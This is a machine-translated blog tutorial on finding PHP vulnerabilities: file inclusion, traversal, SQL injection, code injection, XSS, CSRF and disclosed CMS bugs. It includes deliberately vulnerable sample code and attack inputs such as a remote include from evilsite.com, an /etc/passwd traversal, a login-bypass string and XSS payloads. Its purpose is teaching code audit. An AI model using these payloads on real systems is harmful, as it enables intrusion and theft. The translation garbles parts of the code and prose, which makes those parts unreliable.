PHP vulnerability mining ideas + examples in Chapter 2

Lxj616 · 2014/02/25 12:07

0 x00 background

---

Thank you for your comments and discussion.

Translate and sort out an English paper first, then fill in the examples of my new discovery, first thinking and then examples O(∩_∩)O

To supplement the ideas in the first article, some recently discovered examples have been readded (some are also from wooyun’s public bugs, which belong to the original author and are indicated in the article).

(Thanks to doze Dragon guidance: pay attention to the premise of various vulnerabilities configuration environment, first listed, then detailed)

Under the test conditions in this article, our configuration default looks like this

Disabled_functions = N/A (can use all functions, Register_globals = on (register global variables) allow_url_include = on (limit when files are included, Allow_url_fopen = on magic_quotes_gPC = off (escape quotes and dash and null characters, For example, "become \") short_tag_open = on (used in some scripts) file_uploads = on (any file upload requires... Allow file uploads) display_errors = onCopy the code

0x01 Any file is contained

---

Prerequisite: urL_include is allowed, otherwise upload to absolute path is required

Tip: Use the null byte (truncation) technique, and “?” How to use question marks

There are four functions related to file inclusion in PHP:

Require require_once includes only once include include_once includes only onceCopy the code

For example:

#! php <? php $pagina=$_GET['pagina']; include $pagina.'logged=1'; ? >Copy the code

Example of using null bytes

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00
Copy the code

This removes the.php suffix from the end

Another example is the following

#! php <? php $pagina=$_GET['pagina']; include $pagina.'logged=1'; ? >Copy the code

Use the “?” Question mark example

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1
Copy the code

That’ll get rid of the big mess in the back

How to fix it:

allow_url_include = on
allow_url_fopen = on
Copy the code

Simply put: Don’t allow special characters, filter “/”, or HTTP, HTTPS, FTP, and SMB

Okay, let’s take an example of Frears on a cloud

WooYun: contains ecmall local files

#! 
 $app = isset($_REQUEST['app'])? trim($_REQUEST['app']) : $default_app; 
 $act = isset($_REQUEST['act'])? trim($_REQUEST['act']) : $default_act; 
 // It is clear that $app is under our control, and should be truncated due to the connection to app.php. College $app_file = $config [' app_root]. "/ {$} app. The app. PHP"; 
 // should be a local package, so is_file is true 
 if (! College is_file ($app_file)) {college exit (' Missing controller '); 
}
 // if ($app_file) {// if ($app_file) {// if ($app_file) {// if ($app_file) {// if ($app_file);Copy the code

There are also special ideas, such as the construction of the Joker

WooYun: The local file contained in the university of Jinan main station causes the code to execute

Check it out for yourself, I thought it was only in textbooks…

Possible methods of mining: global search four functions, first only appear in the middle of the file require and other text is strict verification, and then pay attention to the front of the file include when reading through

0x02 Local file is contained

---

Tip: Under Windows we can use “.. \” in place of “.. / “or”.. %5C” (url encoded).

The following cases:

#! php <? php $pagina=$_GET['pagina']; include '/pages/'.$pagina; ? >Copy the code

Examples of use:

http://127.0.0.1/test.php?pagina=.. /.. /.. /.. /.. /.. /etc/passwdCopy the code

Null byte truncation and question mark techniques are common

In fact, and the above similar, but is used across the directory

Fix: Filter dot and slash

0x03 Arbitrary File Download

---

Prerequisite: Remote files can only be opened if url_fopen is on, but arbitrary file downloads in general are not “remote”

Compared to the previous article:

File_get_contents Reads the entire file into a string readfile Displays the entire file file reads into an array fopen Opens the file or URL highlight_file highlights the source show_source displays the source codeCopy the code

The example is the same as the previous article

0 x04 SQL injection

---

Prerequisite: Magic_quotes_gPC = off of course refers to the character type injection, if the number type can still be blind injection

Supplementary landing bypass cases:

#! php $postbruger = $_POST['username']; $postpass = md5($_POST['password']); $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'") or die("<p>" . mysql_error() . "</p>\n");Copy the code

This is a lot easier to use

username : admin ' or ' 1=1
password : sirgod
Copy the code

Mining method: found in the logon injection, not rush stopwatch, can consider bypassing the logon

0x05 Command execution

---

Ph4nt0m Security Team (Advanced PHP Application Vulnerability Audit Technology)

(Below is a short excerpt of the order’s implementation.)

5.4 Code Injection

5.4.1 Functions in PHP that may cause code injection

Most people know that eval and preg_replace+/e can execute code, but they don’t know that PHP has many functions that can execute code, such as:

assert()
call_user_func()
call_user_func_array()
create_function()
Copy the code

Variable function

Here’s a look at some recent examples of create_function() code execution vulnerabilities:

#! php <? php //how to exp this code $sort_by=$_GET["sort_by"]; $sorter="strnatcasecmp"; $databases=array("test","test"); $sort_function = " return 1 * " . $sorter . "($a["" . $sort_by . ""], $b["" . $sort_by . ""]); "; usort($databases, create_function("$a, $b", $sort_function));Copy the code

Vulnerability Audit Strategy

Requirements for the PHP version: None System requirements: None Audit policy: Find corresponding functions (assert,call_user_func,call_user_func_array,create_function, etc.)

5.4.2 Variable Functions and Double quotation marks

Many programmers know the difference between single and double quotation marks.

#! php echo "$a\n"; echo "$a\n";Copy the code

Let’s look at the following code:

#! php //how to exp this code if($globals["bbc_email"]){ $text = preg_replace( array("/\[email=(.*?)\](.*?) \[\/email\]/ies", "/\[email\](.*?) \[\/email\]/ies"), array("check_email("$1", "$2")", "check_email("$1", "$1")"), $text);Copy the code

In addition, many applications store variables as “” in cache files or config or data files, so that people can easily inject variable functions.

Vulnerability Audit Strategy

PHP version requirements: None System requirements: None Audit policy: read through code

0x06 Cross-site Scripting Vulnerability XSS

---

#! php <? php $name=$_GET['name']; print $name; ? > http://127.0.0.1/test.php? name=<script>alert("XSS")</script> #! php <? php $name=addslashes($_GET['name']); print '<table name="'.$name.'"></table>'; ? > http://127.0.0.1/test.php? Name = "> < script > alert (String. FromCharCode,83,83 (88)) < / script >Copy the code

FromCharCode is used to bypass addslashes

Mining method: Focus on the code responsible for output, keeping in mind the general logic used by previous programs to handle variables (filter strength of HTML tags?).

0x07 Variable overwrite

---

Prerequisite: Register_gloabals = on is required

#! php <? php if ($logged==true) { echo 'Logged in.'; } else { print 'Not logged in.'; }? > http://127.0.0.1/test.php? logged=1Copy the code

Login without authentication

0x08 The Admin node can be accessed unauthorized

---

http://127.0.0.1/admin/files.php
http://127.0.0.1/admin/db_lookup.php
Copy the code

This vulnerability may exist if you have direct access without authentication

To find out, register_gloabals = on and then note the first occurrence of the variable

0x09 Cross-Site Request Forgery CSRF

---

Premise: No token is usually combined with XSS

#! php <? php check_auth(); if(isset($_GET['news'])) { unlink('files/news'.$news.'.txt'); } else { die('File not deleted'); }? > http://127.0.0.1/test.php? news=1Copy the code

Causes file deletion, of course, requiring check_auth, but not a problem under CSRF

#! php if ($_GET['func'] == 'delete') { $del_id = $_GET['id']; $query2121 = "select ROLE from {$db_prefix}members WHERE ID='$del_id'"; $result2121 = mysql_query($query2121) or die("delete.php - Error in query: $query2121"); while ($results2121 = mysql_fetch_array($result2121)) { $their_role = $results2121['ROLE']; } if ($their_role ! = '1') { mysql_query("DELETE FROM {$db_prefix}members WHERE id='$del_id'") or die(mysql_error());Copy the code

The key is that there is no confirmation of any kind, just the submission of the request

http://127.0.0.1/index.php?page=admin&act=members&func=delete&id=4
Copy the code

How to fix: Tokens

#! php <? php check_auth(); if(isset($_GET['news']) && $token=$_SESSION['token']) { unlink('files/news'.$news.'.txt'); } else { die('Error.'); }? >Copy the code

So you can’t fake it

http://127.0.0.1/index.php?delete=1&token= [RANDOM_TOKEN]Copy the code

Mining method: Check whether there are token authentication or other forms of authentication for sensitive functions such as “Add administrator”, “change password” and “directly send shell address to others’ email”

0x10 References

---

Part of the content is from [English] www.exploit-db.com/papers/1287… Name : Finding vulnerabilities in PHP scripts FULL ( with examples ) Author : SirGod Email : [email protected]

[email protected

Here are some examples of recent self-discovery

CSCMS V3.5 latest version of SQL injection

---

WooYun: CSCMS V3.5 SQL injection

PS: CSCMS is really a good textbook…

Thank @Wudaokou for your reply in the previous article:

MVC code looks at the framework itself to see if there is a problem, and then looks at the model. How strong the model is determines how much space there is, and variable filtering should be pretty much the same when called in controller, so it's probably not necessary to start reading index.phpCopy the code

After careful consideration, I have a deeper understanding. For example, in this vulnerability, CSCMS reconstructs the code and uses MVC architecture. As expected, xSS_clean of Model is misused (or model does not have the function of preventing injection at all), resulting in a shot in controller. So it’s safe to say that my previous “start with index.php” statement was inappropriate and should depend on the situation

Thanks to @erevus for replying in the previous post:

My experience 
 dig SQL injection, global search select,insert,updata keywords and then find the SQL statement follow up to the passed variable to see if there is any filtering 
 dig arbitrary code execution, global search for various functions that can execute commands, And then one by one look up to follow. Dig XSS college... I'm gonna go straight to the black box and see if it's filtered and then I'm gonna look at the code for filtering and see if I can get around... $member-> WHERE ("username ='". $username. "'")->save ($arr_i); // Update the statusCopy the code

It’s easy to miss important splices in such a framework

PS: Strongly agree with Erevus’ XSS mining method, due to limited ability and energy…

0x12 MacCMS Full Version Kill SQL Injection (including latest 7.x)

---

WooYun: MacCMS all-in-one SQL injection (including the latest 7.x)

In fact, the 7.x was released just when I posted a vulnerability (6.x). I took a look at it for a moment and found that there was a 360 protection script, so I stopped looking, thinking that they must have filtered it out until… $_SERVER[“HTTP_REFERER”]; $_SERVER[“HTTP_REFERER”]; So remind everyone, code audit is to be careful, is to have superhuman patience, do not take it for granted.

0x13 WanCMS can change any user password

---

WooYun: WanCMS allows you to change any user password

I finally found another hole in sensitive business logic

A word about cryptography…

MD5 and SHA are hash functions. If you know $a, it is easy to know MD5 ($a), but if you know $a, it is difficult to recover $a. Des is a symmetric password, and encryption and decryption use the same key

#! php $reurl = $config ['DOMAIN'] . '/accounts/forget_password_t? vc=' . md5 ( md5 ( $username ) );Copy the code

The password reset link here uses MD5 (twice), but the user name is known, so it can be forged directly. This also shows that MD5 is not used for encryption, it should be DES or… The more common method is to add a password and a random number to the MD5 user name, or just a random string of characters.

0x14 WanCMS multiple SQL injection

---

WooYun: WanCMS multiple SQL injection

Another example of injection in the frame

#! php $u_info = $member->where ( "username ='" . $username . "'" )->find ();Copy the code

Before, username is not filtered, although it looks different from the full SQL statement with SELECT, but the effect is the same

0X15 CSCMS V3.5 update update SQL injection

---

WooYun: Another SQL injection after CSCMS V3.5 patch

This is one of the addslash+ unquoted blind annotations that the manufacturers missed, but what’s new is that they seem to have used magic_quotes_gPC for a while, but they put a lot of quotes around the numbers, and they missed a few…

0x16 TCCMS (latest) 8.0 GETSHELL

WooYun: TCCMS 8.0 GETSHELL

Upload any file, provided that the upload is ON

#! php $fullPath = $path . "/" . $_POST["name"];Copy the code

I can’t believe I just pulled it out of the POST.

In general this should be a uUID random number name, or at least a suffix imposed on invisible characters.

The result of taking values directly from POST is arbitrary file uploads.

0x17 iSiteCMS still has several injection vulnerabilities after release of security patch

---

WooYun: iSiteCMS still has several injection vulnerabilities after the release of the security patch.

This injection has a special feature that the comma (,) is filtered, so it is very difficult to run off the clock, and other methods are needed to verify the harm

#! php $tos = explode(',',trim($arr['to']));Copy the code

Yes, that one kills the comma

Solution: Stop running off the clock and try to construct an error echo (because there is no echo on the normal page) to directly reveal the administrator password

Thinking summary: variable statement without the comma can’t breakthrough hit the first injection can’t echo, insist to read, the program can continue to run, and found that there are 1 will also be injected into, and then injected into the results and joining together to another SQL statement, and an error is open, so the structure where the SQL error back to show the password

0x18 CSCMS V3.5 latest version of background command execute GETSHELL

---

WooYun: CSCMS V3.5 latest version of the background command to execute GETSHELL

[email protected] : The framework will have a lot of hidden holes. It’s not clear how to dig them. For example, double quotes cause code execution.

I want to imitate the “Dede background getShell [20130715]” the original author unknown results…… It’s different, but the idea is: There is always a place to save Settings in the background, and the place to save Settings is usually to write config.php to save Settings (because PHP extensions prevent ETC from being downloaded arbitrarily). In this case, if the filtering is not enough to save Settings, arbitrary files can be written, and PHP files can be executed at every turn

But the sense of a hidden loophole is too intellectual to be discovered by ordinary thought